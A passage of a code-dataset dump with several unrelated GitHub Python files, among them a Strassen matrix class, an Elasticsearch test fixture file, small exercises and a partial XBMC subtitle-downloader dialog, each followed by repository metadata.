self.rows <= cutoff:\n return self.BMM(other)\n \n if (self.rows == 1):\n result = Matrix().importData([[\n self[0][0] * other[0][0]\n ]])\n return result\n\n # Check that matrix is a power of 2\n if (not (self.rows & (self.rows-1) == 0) and self.rows 
!= 0):\n m = Matrix.__findNextPowerOf2(self.rows)\n # Deep copy of self and other (as to not modify their data)\n a = Matrix().importData([row[:] for row in self.data])\n a.expandMatrix(m, m)\n b = Matrix().importData([row[:] for row in other.data])\n b.expandMatrix(m, m)\n else:\n a = self\n b = other\n\n # Result matrix\n result = Matrix().makeMatrix(a.rows, a.columns)\n # Dimensions of sub-matrices\n k = a.rows // 2\n # Define and initialize sub-matrices (may be slow)\n ma11 = Matrix().makeSubMatrix(k, k, a, 0, 0)\n ma12 = Matrix().makeSubMatrix(k, k, a, 0, k)\n ma21 = Matrix().makeSubMatrix(k, k, a, k, 0)\n ma22 = Matrix().makeSubMatrix(k, k, a, k, k)\n mb11 = Matrix().makeSubMatrix(k, k, b, 0, 0)\n mb12 = Matrix().makeSubMatrix(k, k, b, 0, k)\n mb21 = Matrix().makeSubMatrix(k, k, b, k, 0)\n mb22 = Matrix().makeSubMatrix(k, k, b, k, k)\n # Define + initialize has a runtime of 8(k^2)\n # \t- Optimized to 7(k^2), but still a nasty amount of overhead\n # If this was programmed in c, we could simply move the pointers\n # \tfor this to run in constant time\n\n p1 = ma11.SAMk(mb12 - mb22, cutoff)\n p2 = (ma11 + ma12).SAMk(mb22, cutoff)\n p3 = (ma21 + ma22).SAMk(mb11, cutoff)\n p4 = ma22.SAMk(mb21 - mb11, cutoff)\n p5 = (ma11 + ma22).SAMk(mb11 + mb22, cutoff)\n p6 = (ma12 - ma22).SAMk(mb21 + mb22, cutoff)\n p7 = (ma11 - ma21).SAMk(mb11 + mb12, cutoff)\n\n mr11 = (p5 + p4 + p6) - p2\n mr12 = p1 + p2\n mr21 = p3 + p4\n mr22 = (p5 + p1) - p3 - p7\n\n for i in range(k):\n for j in range(k):\n result[i][j] = mr11[i][j]\n result[i][j+k] = mr12[i][j]\n result[k+i][j] = mr21[i][j]\n result[k+i][k+j] = mr22[i][j]\n # Trim result back down to correct size\n result.rows = self.rows\n result.columns = self.columns\n result.data = [result[i][:result.columns] for i in range(result.rows)]\n\n return result\n\n\n def expandMatrix(self, rows, columns, *, fill = lambda i, j: 0):\n # Expand current columns to be taller\n for i in range(self.rows):\n for j in range(self.columns, columns):\n self[i].append(fill(i, j))\n\n # Add extra columns\n for i in range(self.rows, rows):\n column = []\n for j in range(columns):\n column.append(fill(i, j))\n self.data.append(column)\n self.rows = rows\n self.columns = columns\n return self\n\n @staticmethod\n def __findNextPowerOf2(n):\n #Bit manipulation stuff to find next power of 2 from n \n n = n - 1\n\n n |= n >> 1\n n |= n >> 2\n n |= n >> 4\n n |= n >> 8\n n |= n >> 16\n\n return n + 1\n\n # Functions for pretty printing\n # -----------------------------\n\n # Gets witdh of the largest element in the matrix\n def getColumnWidth(self):\n width = 0\n for i in range(0, self.rows):\n for j in range(0, self.columns):\n if len(str(self.data[i][j])) > width:\n width = len(str(self.data[i][j]))\n return width\n\n # Gets total width of the matrix\n def getMatrixWidth(self):\n width = 2 \t\t\t# | and |\n width = width + 1 \t# padding before second |\n width = width + (self.getColumnWidth() + 1) * self.columns\n return width\n\n # Converts matrix data to pretty-array format for printing\n def toArray(self):\n width = self.getColumnWidth()\n body = []\n\n for i in range(self.rows):\n if self.rows == 1:\n symbols = (\"│\", \"│\")\n elif i == 0:\n symbols = (\"┌\", \"┐\")\n elif i == self.rows - 1:\n symbols = (\"└\", \"┘\")\n else:\n symbols = (\"│\", \"│\")\n\n line = symbols[0]\n for j in range(self.columns):\n line = line + f\" {self.data[i][j]:<{width}}\"\n line = line + \" \" + symbols[1]\n body.append(line)\n\n return body\n\n def __str__(self):\n body = self.toArray()\n text 
= \"\\n\"\n text = text.join(body)\n return text\n\n \"\"\"\n Pads the top + bottom of an array so that it displays nicely\n \"\"\"\n @staticmethod\n def padMatrixArray(matrix, width, targetHeight):\n if(len(matrix) < targetHeight):\n delta = int((targetHeight - len(matrix))/2)\n # Prepend blanks to top of array\n for _ in range(0, delta):\n matrix.insert(0, \" \" * width)\n # Append blanks to bottom of array\n for _ in range(len(matrix), targetHeight):\n matrix.append(\" \" * width)\n\n return matrix\n\n \"\"\"\n Prints the 3 provided matrices in the form\n matrix1 * matrix2 = resultMatrix\n ~does not perform multiplacation~\n \"\"\"\n @staticmethod\n def printEquation(matrix1, matrix2, resultMatrix, *, symbol=\"*\"):\n\n m1 = matrix1.toArray()\n m2 = matrix2.toArray()\n result = resultMatrix.toArray()\n\n height = max(matrix1.rows, matrix2.rows, resultMatrix.rows)\n\n # Pad matrices to line up nicely\n m1 = Matrix.padMatrixArray(m1, matrix1.getMatrixWidth(), height)\n m2 = Matrix.padMatrixArray(m2, matrix2.getMatrixWidth(), height)\n result = Matrix.padMatrixArray(result, resultMatrix.getMatrixWidth(), height)\n\n mid = int((height-1) // 2)\n for i in range(0, mid):\n print(f\"{m1[i]} {m2[i]} {result[i]}\")\n\n print(f\"{m1[mid]} {symbol} {m2[mid]} = {result[mid]}\")\n\n for i in range(mid + 1, height):\n print(f\"{m1[i]} {m2[i]} {result[i]}\")\n\n\n\n","repo_name":"PvtPuddles/441TermProject","sub_path":"Matrix.py","file_name":"Matrix.py","file_ext":"py","file_size_in_byte":11730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18296211172","text":"import time\nfrom pathlib import Path\nfrom typing import Callable\n\nimport pytest\nfrom indigo import Indigo # type: ignore\n\nfrom bingo_elastic.elastic import (\n AsyncElasticRepository,\n ElasticRepository,\n IndexName,\n)\nfrom bingo_elastic.model.helpers import iterate_file, load_reaction\nfrom bingo_elastic.model.record import IndigoRecordMolecule\n\n\n@pytest.fixture()\ndef resource_loader() -> Callable[[str], str]:\n cwd = Path.cwd()\n\n def wrapper(resource: str):\n if cwd.name == \"tests\":\n return str(Path(\"resources\") / resource)\n if cwd.name == \"model\":\n return str(cwd.parent / \"resources\" / resource)\n return str(cwd / \"tests\" / \"resources\" / resource)\n\n return wrapper\n\n\n@pytest.fixture\ndef indigo_fixture() -> Indigo:\n return Indigo()\n\n\n@pytest.fixture\ndef elastic_repository_molecule() -> ElasticRepository:\n x = ElasticRepository(\n IndexName.BINGO_MOLECULE, host=\"127.0.0.1\", port=9200\n )\n return x\n\n\n@pytest.fixture\ndef elastic_repository_reaction() -> ElasticRepository:\n return ElasticRepository(\n IndexName.BINGO_REACTION, host=\"127.0.0.1\", port=9200\n )\n\n\n@pytest.fixture\ndef a_elastic_repository_molecule() -> Callable[[], AsyncElasticRepository]:\n def wraped():\n return AsyncElasticRepository(\n IndexName.BINGO_MOLECULE, host=\"127.0.0.1\", port=9200\n )\n\n return wraped\n\n\n@pytest.fixture\ndef a_elastic_repository_reaction() -> Callable[[], AsyncElasticRepository]:\n def wraped():\n return AsyncElasticRepository(\n IndexName.BINGO_REACTION, host=\"127.0.0.1\", port=9200\n )\n\n return wraped\n\n\n@pytest.fixture(autouse=True)\ndef clear_index(\n elastic_repository_molecule: ElasticRepository,\n elastic_repository_reaction: ElasticRepository,\n):\n elastic_repository_molecule.delete_all_records()\n elastic_repository_reaction.delete_all_records()\n\n\n@pytest.fixture\ndef loaded_sdf(\n elastic_repository_molecule: 
ElasticRepository, resource_loader\n) -> IndigoRecordMolecule:\n    resource = resource_loader(\"molecules/rand_queries_small.sdf\")\n    sdf = iterate_file(Path(resource))\n    elastic_repository_molecule.index_records(sdf, chunk_size=10)\n    time.sleep(5)\n    return next(\n        iterate_file(Path(resource_loader(\"molecules/rand_queries_small.sdf\")))\n    )\n\n\n@pytest.fixture\ndef loaded_rxns(\n    elastic_repository_reaction: ElasticRepository,\n    resource_loader: Callable[[str], str],\n    indigo_fixture,\n):\n    for file_ in Path(resource_loader(\"reactions/rheadb\")).iterdir():\n        if file_.suffix == \".rxn\":\n            reaction_file = load_reaction(file_, indigo_fixture)\n            elastic_repository_reaction.index_record(reaction_file)\n\n    time.sleep(5)\n","repo_name":"epam/Indigo","sub_path":"bingo/bingo-elastic/python/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"en","doc_type":"code","stars":257,"dataset":"github-code","pt":"53"} +{"seq_id":"13032214687","text":"#!/usr/bin/python\n# -*- coding:utf-8 -*-\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# Data\nY = np.random.normal(loc=0.0, scale=1.0, size=10000)\nX = np.random.random(size=10000)\n\n# Example 1:\nplt.figure()\n_ = plt.hist2d(X, Y, bins=25)\nplt.show()\n\n# Example 2:\nplt.figure()\n_ = plt.hist2d(X, Y, bins=100)\n# add a colorbar legend\nplt.colorbar()\nplt.show()\n","repo_name":"shijiansu/coursera-applied-data-science-with-python","sub_path":"2_applied_data_representation/w3_charting_fundamentals/1_chart/4_heatmap.py","file_name":"4_heatmap.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17455053548","text":"n = int(input())\ncnt = 0\nwords = []\nfor i in range(n):\n    words.append(sorted(list(input())))\n# each pass strips one complete anagram group from the list, so cnt counts the groups\nwhile words:\n    target = words[0]\n    words = [word for word in words if word != target]\n    cnt += 1\n\nprint(cnt)\n","repo_name":"apple3285/Programing_training","sub_path":"백준_문자열-실버-문제-모음/61-동일한_단어_그룹화하기.py","file_name":"61-동일한_단어_그룹화하기.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"18569821785","text":"# File name   : max3v1.py\n# Author      : Ahmad Alexander\n# Date        : 9 September 2019\n# Description : determine the maximum of 3 integers\n\n# Definition and specification of the max3 function max(a,b,c):\n# max3 : 3 integers --> integer\n# max3(a,b,c) determines the maximum of 3 distinct integers a, b, and c, using conditional expressions, version 1\n\n# Implementation\ndef max3(a, b, c):\n    if (a > b) and (a > c):\n        return a\n    elif (b > a) and (b > c):\n        return b\n    elif (c > a) and (c > b):\n        return c\n\n\n# Application\nprint(max3(12, 7, 5))\nprint(max3(4, 9, -10))\nprint(max3(100, -20, 300))\n\n","repo_name":"ahmadalexanderr/dasar-pemrograman","sub_path":"praktikum/praktikum_pre-uts/3/max3v1.py","file_name":"max3v1.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32893151810","text":"section_list = [{\n    \"label\": \"A Different Label\",\n    \"other_data\": \"Other Data\",\n},\n{\n    \"label\": \"Reel Reassignment\",\n    \"more_data\": \"More Data\",\n}]\n\n# Filter the list to find the first object whose \"label\" attribute matches\nreassign_section = next(filter(lambda s: 
s.get(\"label\") == \"Reel Reassignment\", section_list))\n\nprint(reassign_section)\n","repo_name":"revainisdead/christian-revain-hall","sub_path":"temp_code/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27186542810","text":"import heapq\nN = int(input())\nx = list(map(int,input().split(\" \")))\nc = list(map(int,input().split(\" \")))\nv = list(map(int,input().split(\" \")))\n\ncv = [(C,V) for C,V in zip(c,v)]\n\ncv.sort(key=lambda x: x[1])\n\nmoney = 0\nans = 0\nsave = 0\nfor i in range(N):\n\tprint(cv)\n\tmoney += x[i]\n\ttmp_money = money\n\ttmp = 0\n\tsave += 1 \n\tfor cost,val in cv[::-1]:\n\t\tif cost <= tmp_money:\n\t\t\tif 0 < save:\n\t\t\t\tcv.remove((cost,val))\n\t\t\t\tsave -= 1\n\t\t\telse:\n\t\t\t\ttmp_money -= cost\n\t\t\t\ttmp += val\n\n\tans = max(ans,tmp)\n\tprint(ans)\n\nprint(ans)\n\n\n\n\n\n\n","repo_name":"banboooo044/AtCoder","sub_path":"procon/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18579234095","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport re\nimport sys\nimport xbmc\nimport urllib\nimport socket\nimport xbmcgui\n\nfrom utilities import *\n\n_ = sys.modules[ \"__main__\" ].__language__\n__scriptname__ = sys.modules[ \"__main__\" ].__scriptname__\n__addon__ = sys.modules[ \"__main__\" ].__addon__\n__profile__ = sys.modules[ \"__main__\" ].__profile__\n__version__ = sys.modules[ \"__main__\" ].__version__\n\nclass GUI( xbmcgui.WindowXMLDialog ):\n\n def __init__( self, *args, **kwargs ):\n pass\n\n def onInit( self ):\n self.on_run()\n\n def on_run( self ):\n if not xbmc.getCondVisibility(\"VideoPlayer.HasSubtitles\"):\n self.getControl( 111 ).setVisible( False )\n self.list_services()\n try:\n self.Search_Subtitles()\n except:\n errno, errstr = sys.exc_info()[:2]\n xbmc.sleep(2000)\n self.close()\n\n def set_allparam(self):\n self.list = []\n service_list = []\n self.stackPath = []\n service = \"\"\n self.man_search_str = \"\"\n self.temp = False\n self.rar = False\n self.stack = False\n self.autoDownload = False\n self.focused = False\n use_subs_folder = __addon__.getSetting( \"use_subs_folder\" ) == \"true\" # use 'Subs' subfolder for storing subtitles\n movieFullPath = urllib.unquote(xbmc.Player().getPlayingFile().decode('utf-8'))# Full path of a playing file\n useMovieFolderForSubs= __addon__.getSetting( \"subfolder\" ) == \"true\" # True for movie folder\n self.sub_folder = xbmc.translatePath(__addon__.getSetting( \"subfolderpath\" )).decode(\"utf-8\") # User specified subtitle folder\n self.year = xbmc.getInfoLabel(\"VideoPlayer.Year\") # Year\n self.season = str(xbmc.getInfoLabel(\"VideoPlayer.Season\")) # Season\n self.episode = str(xbmc.getInfoLabel(\"VideoPlayer.Episode\")) # Episode\n self.mansearch = __addon__.getSetting( \"searchstr\" ) == \"true\" # Manual search string??\n self.parsearch = __addon__.getSetting( \"par_folder\" ) == \"true\" # Parent folder as search string\n self.language_1 = languageTranslate(__addon__.getSetting( \"Lang01\" ), 4, 0) # Full language 1\n self.language_2 = languageTranslate(__addon__.getSetting( \"Lang02\" ), 4, 0) # Full language 2\n self.language_3 = languageTranslate(__addon__.getSetting( \"Lang03\" ), 4, 0) # Full language 3\n self.tmp_sub_dir = os.path.join( __profile__ ,\"sub_tmp\" ) # Temporary subtitle extraction directory\n 
self.stream_sub_dir = os.path.join( __profile__ ,\"sub_stream\" ) # Stream subtitle directory\n\n self.clean_temp() # clean temp dirs\n\n if ( movieFullPath.find(\"http\") > -1 ):\n self.sub_folder = self.stream_sub_dir\n self.temp = True\n\n elif ( movieFullPath.find(\"rar://\") > -1 ):\n self.rar = True\n movieFullPath = os.path.dirname(movieFullPath[6:])\n\n elif ( movieFullPath.find(\"stack://\") > -1 ):\n self.stackPath = movieFullPath.split(\" , \")\n movieFullPath = self.stackPath[0][8:]\n self.stack = True\n\n if useMovieFolderForSubs and not self.temp:\n if use_subs_folder:\n self.sub_folder = os.path.join(os.path.dirname( movieFullPath ),'Subs')\n xbmcvfs.mkdirs(self.sub_folder)\n else:\n self.sub_folder = os.path.dirname( movieFullPath )\n\n if not xbmcvfs.exists(self.sub_folder):\n xbmcvfs.mkdir(self.sub_folder)\n\n if self.episode.lower().find(\"s\") > -1: # Check if season is \"Special\"\n self.season = \"0\" #\n self.episode = self.episode[-1:] #\n\n self.tvshow = normalizeString(xbmc.getInfoLabel(\"VideoPlayer.TVshowtitle\")) # Show\n self.title = normalizeString(xbmc.getInfoLabel(\"VideoPlayer.OriginalTitle\"))# try to get original title\n if self.title == \"\":\n log( __name__, \"VideoPlayer.OriginalTitle not found\")\n self.title = normalizeString(xbmc.getInfoLabel(\"VideoPlayer.Title\")) # no original title, get just Title :)\n\n if self.tvshow == \"\":\n if str(self.year) == \"\": # If we have a year, assume no tv show\n self.title, self.year = xbmc.getCleanMovieTitle( self.title ) # Clean before trying tvshow regex, else we get false results on some movies\n if str(self.year) == \"\": # Still no year: *could* be a tvshow\n title, season, episode = regex_tvshow(False, self.title)\n if title != \"\" and season != \"\" and episode != \"\":\n self.season = str(int(season))\n self.episode = str(int(episode))\n self.tvshow = title\n else:\n self.season = \"\" # Reset variables: could contain garbage from tvshow regex above\n self.episode = \"\"\n self.tvshow = \"\"\n else:\n self.year = \"\"\n\n self.file_original_path = urllib.unquote ( movieFullPath ) # Movie Path\n\n if (__addon__.getSetting( \"fil_name\" ) == \"true\"): # Display Movie name or search string\n self.file_name = os.path.basename( movieFullPath )\n else:\n if (len(str(self.year)) < 1 ) :\n self.file_name = self.title.encode('utf-8')\n if (len(self.tvshow) > 0):\n self.file_name = \"%s S%.2dE%.2d\" % (self.tvshow.encode('utf-8'),\n int(self.season),\n int(self.episode)\n )\n else:\n self.file_name = \"%s (%s)\" % (self.title.encode('utf-8'), str(self.year))\n\n if ((__addon__.getSetting( \"auto_download\" ) == \"true\") and\n (__addon__.getSetting( \"auto_download_file\" ) != os.path.basename( movieFullPath ))):\n self.autoDownload = True\n __addon__.setSetting(\"auto_download_file\", \"\")\n xbmc.executebuiltin((u\"Notification(%s,%s,10000)\" % (__scriptname__, _(763))).encode(\"utf-8\"))\n\n for name in os.listdir(SERVICE_DIR):\n if os.path.isdir(os.path.join(SERVICE_DIR,name)) and __addon__.getSetting( name ) == \"true\":\n service_list.append( name )\n service = name\n\n if len(self.tvshow) > 0:\n def_service = __addon__.getSetting( \"deftvservice\")\n else:\n def_service = __addon__.getSetting( \"defmovieservice\")\n\n if service_list.count(def_service) > 0:\n service = def_service\n\n if len(service_list) > 0:\n if len(service) < 1:\n self.service = service_list[0]\n else:\n self.service = service\n\n self.service_list = service_list\n self.next = list(service_list)\n\n log( __name__ ,\"Addon Version: 
[%s]\" % __version__)\n log( __name__ ,\"Manual Search : [%s]\" % self.mansearch)\n log( __name__ ,\"Default Service : [%s]\" % self.service)\n log( __name__ ,\"Services : [%s]\" % self.service_list)\n log( __name__ ,\"Temp?: [%s]\" % self.temp)\n log( __name__ ,\"Rar?: [%s]\" % self.rar)\n log( __name__ ,\"File Path: [%s]\" % self.file_original_path)\n log( __name__ ,\"Year: [%s]\" % str(self.year))\n log( __name__ ,\"Tv Show Title: [%s]\" % self.tvshow)\n log( __name__ ,\"Tv Show Season: [%s]\" % self.season)\n log( __name__ ,\"Tv Show Episode: [%s]\" % self.episode)\n log( __name__ ,\"Movie/Episode Title: [%s]\" % self.title)\n log( __name__ ,\"Subtitle Folder: [%s]\" % self.sub_folder)\n log( __name__ ,\"Languages: [%s] [%s] [%s]\" % (self.language_1, self.language_2, self.language_3))\n log( __name__ ,\"Parent Folder Search: [%s]\" % self.parsearch)\n log( __name__ ,\"Stacked(CD1/CD2)?: [%s]\" % self.stack)\n\n return self.autoDownload\n\n def Search_Subtitles( self, gui = True ):\n self.subtitles_list = []\n self.session_id = \"\"\n if gui:\n self.getControl( SUBTITLES_LIST ).reset()\n self.getControl( LOADING_IMAGE ).setImage(\n xbmc.translatePath(\n os.path.join(\n SERVICE_DIR,\n self.service,\n \"logo.png\")))\n\n exec ( \"from services.%s import service as Service\" % (self.service))\n self.Service = Service\n if gui:\n self.getControl( STATUS_LABEL ).setLabel( _( 646 ))\n msg = \"\"\n socket.setdefaulttimeout(float(__addon__.getSetting( \"timeout\" )))\n try:\n self.subtitles_list, self.session_id, msg = self.Service.search_subtitles(\n self.file_original_path,\n self.title,\n self.tvshow,\n self.year,\n self.season,\n self.episode,\n self.temp,\n self.rar,\n self.language_1,\n self.language_2,\n self.language_3,\n self.stack\n )\n except socket.error:\n errno, errstr = sys.exc_info()[:2]\n if errno == socket.timeout:\n msg = _( 656 )\n else:\n msg = \"%s: %s\" % ( _( 653 ),str(errstr[1]), )\n except:\n errno, errstr = sys.exc_info()[:2]\n msg = \"Error: %s\" % ( str(errstr), )\n socket.setdefaulttimeout(None)\n if gui:\n self.getControl( STATUS_LABEL ).setLabel( _( 642 ) % ( \"...\", ))\n\n if not self.subtitles_list:\n if __addon__.getSetting( \"search_next\" )== \"true\" and len(self.next) > 1:\n xbmc.sleep(1500)\n self.next.remove(self.service)\n self.service = self.next[0]\n self.show_service_list(gui)\n log( __name__ ,\"Auto Searching '%s' Service\" % (self.service))\n self.Search_Subtitles(gui)\n else:\n self.next = list(self.service_list)\n if gui:\n select_index = 0\n if msg != \"\":\n self.getControl( STATUS_LABEL ).setLabel( msg )\n else:\n self.getControl( STATUS_LABEL ).setLabel( _( 657 ))\n self.show_service_list(gui)\n if self.autoDownload:\n xbmc.executebuiltin((u\"Notification(%s,%s,%i)\" % (__scriptname__, _(767), 1000)).encode(\"utf-8\"))\n else:\n subscounter = 0\n itemCount = 0\n list_subs = []\n mainLangISO = languageTranslate(self.language_1, 0, 3)\n for item in self.subtitles_list:\n if (self.autoDownload and item[\"sync\"] and\n languageTranslate(item[\"language_name\"], 0, 3) == mainLangISO\n ):\n self.Download_Subtitles(itemCount, True, gui)\n __addon__.setSetting(\"auto_download_file\",\n os.path.basename( self.file_original_path ))\n if self.autoDownload:\n xbmc.executebuiltin((u\"Notification(%s,%s,%i)\" % (__scriptname__, _(765), 1000)).encode(\"utf-8\"))\n return True\n else:\n if gui:\n listitem = xbmcgui.ListItem(label=_( languageTranslate(item[\"language_name\"],0,5)),\n label2=item[\"filename\"],\n iconImage=item[\"rating\"],\n 
thumbnailImage=item[\"language_flag\"]\n )\n if item[\"sync\"]:\n listitem.setProperty( \"sync\", \"true\" )\n else:\n listitem.setProperty( \"sync\", \"false\" )\n\n if item.get(\"hearing_imp\", False):\n listitem.setProperty( \"hearing_imp\", \"true\" )\n else:\n listitem.setProperty( \"hearing_imp\", \"false\" )\n\n self.list.append(subscounter)\n subscounter = subscounter + 1\n list_subs.append(listitem)\n itemCount += 1\n\n if gui:\n label = '%i %s '\"' %s '\"'' % (len ( self.subtitles_list ),_( 744 ),self.file_name)\n self.getControl( STATUS_LABEL ).setLabel( label )\n self.getControl( SUBTITLES_LIST ).addItems( list_subs )\n self.setFocusId( SUBTITLES_LIST )\n self.getControl( SUBTITLES_LIST ).selectItem( 0 )\n if self.autoDownload:\n xbmc.executebuiltin((u\"Notification(%s,%s,%i)\" % (__scriptname__, _(767), 1000)).encode(\"utf-8\"))\n return False\n\n def Download_Subtitles( self, pos, auto = False, gui = True ):\n if gui:\n if auto:\n self.getControl( STATUS_LABEL ).setLabel( _( 763 ))\n else:\n self.getControl( STATUS_LABEL ).setLabel( _( 649 ))\n compressed_subs = os.path.join( self.tmp_sub_dir, \"compressed_subs.ext\")\n compressed, language, file = self.Service.download_subtitles(self.subtitles_list,\n pos,\n compressed_subs,\n self.tmp_sub_dir,\n self.sub_folder,\n self.session_id\n )\n sub_lang = str(languageTranslate(language,0,2))\n\n if compressed:\n # backward compatibility\n if (file == \"\"):\n file = \"zip\"\n suffixed_compressed_subs = re.sub(\"\\.ext$\",\".%s\" % file,compressed_subs)\n os.rename(compressed_subs,suffixed_compressed_subs)\n log(__name__,\"Extracting %s\" % suffixed_compressed_subs)\n self.Extract_Subtitles(suffixed_compressed_subs,sub_lang, gui)\n else:\n sub_ext = os.path.splitext( file )[1]\n if self.temp:\n sub_name = \"temp_sub\"\n else:\n sub_name = os.path.splitext( os.path.basename( self.file_original_path ))[0]\n if (__addon__.getSetting( \"lang_to_end\" ) == \"true\"):\n file_name = u\"%s.%s%s\" % ( sub_name, sub_lang, sub_ext )\n else:\n file_name = u\"%s%s\" % ( sub_name, sub_ext )\n file_from = file\n file_to = xbmc.validatePath(os.path.join(self.sub_folder, file_name)).decode(\"utf-8\")\n # Create a files list of from-to tuples so that multiple files may be\n # copied (sub+idx etc')\n files_list = [(file_from,file_to)]\n # If the subtitle's extension sub, check if an idx file exists and if so\n # add it to the list\n if ((sub_ext == \".sub\") and (os.path.exists(file[:-3]+\"idx\"))):\n log( __name__ ,\"found .sub+.idx pair %s + %s\" % (file_from,file_from[:-3]+\"idx\"))\n files_list.append((file_from[:-3]+\"idx\",file_to[:-3]+\"idx\"))\n for cur_file_from, cur_file_to in files_list:\n subtitle_set,file_path = copy_files( cur_file_from, cur_file_to )\n # Choose the last pair in the list, second item (destination file)\n if subtitle_set:\n subtitle = files_list[-1][1]\n xbmc.Player().setSubtitles(subtitle.encode(\"utf-8\"))\n self.close()\n else:\n if gui:\n self.getControl( STATUS_LABEL ).setLabel( _( 654 ))\n self.show_service_list(gui)\n\n def Extract_Subtitles( self, zip_subs, subtitle_lang, gui = True ):\n xbmc.executebuiltin(('XBMC.Extract(\"%s\",\"%s\")' % (zip_subs,self.tmp_sub_dir)).encode('utf-8'))\n xbmc.sleep(1000)\n files = os.listdir(self.tmp_sub_dir)\n sub_filename = os.path.basename( self.file_original_path )\n exts = [\".srt\", \".sub\", \".txt\", \".smi\", \".ssa\", \".ass\" ]\n subtitle_set = False\n if len(files) < 1 :\n if gui:\n self.getControl( STATUS_LABEL ).setLabel( _( 654 ))\n self.show_service_list(gui)\n else 
:\n if gui:\n self.getControl( STATUS_LABEL ).setLabel( _( 652 ))\n subtitle_set = False\n movie_sub = False\n episode = 0\n for zip_entry in files:\n if os.path.splitext( zip_entry )[1] in exts:\n subtitle_file, file_path = self.create_name(zip_entry,sub_filename,subtitle_lang)\n if len(self.tvshow) > 0:\n title, season, episode = regex_tvshow(False, zip_entry)\n if not episode : episode = -1\n else:\n if os.path.splitext( zip_entry )[1] in exts:\n movie_sub = True\n if ( movie_sub or int(episode) == int(self.episode)):\n if self.stack:\n try:\n for subName in self.stackPath:\n if (re.split(\"(?x)(?i)\\CD(\\d)\",\n zip_entry)[1]) == (re.split(\"(?x)(?i)\\CD(\\d)\",\n urllib.unquote ( subName ))[1]\n ):\n subtitle_file, file_path = self.create_name(\n zip_entry,\n urllib.unquote(os.path.basename(subName[8:])),\n subtitle_lang\n )\n subtitle_set,file_path = copy_files( subtitle_file, file_path )\n if re.split(\"(?x)(?i)\\CD(\\d)\", zip_entry)[1] == \"1\":\n subToActivate = file_path\n except:\n subtitle_set = False\n else:\n subtitle_set,subToActivate = copy_files( subtitle_file, file_path )\n\n if not subtitle_set:\n for zip_entry in files:\n if os.path.splitext( zip_entry )[1] in exts:\n subtitle_file, file_path = self.create_name(zip_entry,sub_filename,subtitle_lang)\n subtitle_set,subToActivate = copy_files( subtitle_file, file_path )\n\n if subtitle_set :\n xbmc.Player().setSubtitles(subToActivate.encode(\"utf-8\"))\n self.close()\n else:\n if gui:\n self.getControl( STATUS_LABEL ).setLabel( _( 654 ))\n self.show_service_list(gui)\n\n def clean_temp( self ):\n for temp_dir in [self.stream_sub_dir,self.tmp_sub_dir]:\n rem_files(temp_dir)\n\n\n def show_service_list(self,gui):\n try:\n select_index = self.service_list.index(self.service)\n except IndexError:\n select_index = 0\n if gui:\n self.setFocusId( SERVICES_LIST )\n self.getControl( SERVICES_LIST ).selectItem( select_index )\n\n def create_name(self,zip_entry,sub_filename,subtitle_lang):\n if self.temp:\n name = \"temp_sub\"\n else:\n name = os.path.splitext( sub_filename )[0]\n if (__addon__.getSetting( \"lang_to_end\" ) == \"true\"):\n file_name = u\"%s.%s%s\" % ( name,\n subtitle_lang,\n os.path.splitext( zip_entry )[1] )\n else:\n file_name = u\"%s%s\" % ( name, os.path.splitext( zip_entry )[1] )\n log( __name__ ,\"Sub in Archive [%s], File Name [%s]\" % (zip_entry,\n file_name))\n ret_zip_entry = xbmc.validatePath(os.path.join(self.tmp_sub_dir,zip_entry)).decode(\"utf-8\")\n ret_file_name = xbmc.validatePath(os.path.join(self.sub_folder,file_name)).decode(\"utf-8\")\n return ret_zip_entry,ret_file_name\n\n def list_services( self ):\n self.list = []\n all_items = []\n self.getControl( SERVICES_LIST ).reset()\n for serv in self.service_list:\n listitem = xbmcgui.ListItem( serv )\n self.list.append(serv)\n listitem.setProperty( \"man\", \"false\" )\n all_items.append(listitem)\n\n if self.mansearch :\n listitem = xbmcgui.ListItem( _( 612 ))\n listitem.setProperty( \"man\", \"true\" )\n self.list.append(\"Man\")\n all_items.append(listitem)\n\n if self.parsearch :\n listitem = xbmcgui.ListItem( _( 747 ))\n listitem.setProperty( \"man\", \"true\" )\n self.list.append(\"Par\")\n all_items.append(listitem)\n\n listitem = xbmcgui.ListItem( _( 762 ))\n listitem.setProperty( \"man\", \"true\" )\n self.list.append(\"Set\")\n all_items.append(listitem)\n self.getControl( SERVICES_LIST ).addItems( all_items )\n\n def keyboard(self, parent):\n dir, self.year = xbmc.getCleanMovieTitle(self.file_original_path, self.parsearch)\n if not 
parent:\n if self.man_search_str != \"\":\n srchstr = self.man_search_str\n else:\n srchstr = \"%s (%s)\" % (dir,self.year)\n kb = xbmc.Keyboard(srchstr, _( 751 ), False)\n text = self.file_name\n kb.doModal()\n if (kb.isConfirmed()): text, self.year = xbmc.getCleanMovieTitle(kb.getText())\n self.title = text\n self.man_search_str = text\n else:\n self.title = dir\n\n log( __name__ ,\"Manual/Keyboard Entry: Title:[%s], Year: [%s]\" % (self.title, self.year))\n if self.year != \"\" :\n self.file_name = \"%s (%s)\" % (self.file_name, str(self.year))\n else:\n self.file_name = self.title\n self.tvshow = \"\"\n self.next = list(self.service_list)\n self.Search_Subtitles()\n\n def onClick( self, controlId ):\n if controlId == SUBTITLES_LIST:\n self.Download_Subtitles( self.getControl( SUBTITLES_LIST ).getSelectedPosition())\n\n elif controlId == SERVICES_LIST:\n xbmc.executebuiltin(\"Skin.Reset(SubtitleSourceChooserVisible)\")\n selection = str(self.list[self.getControl( SERVICES_LIST ).getSelectedPosition()])\n self.setFocusId( 120 )\n\n if selection == 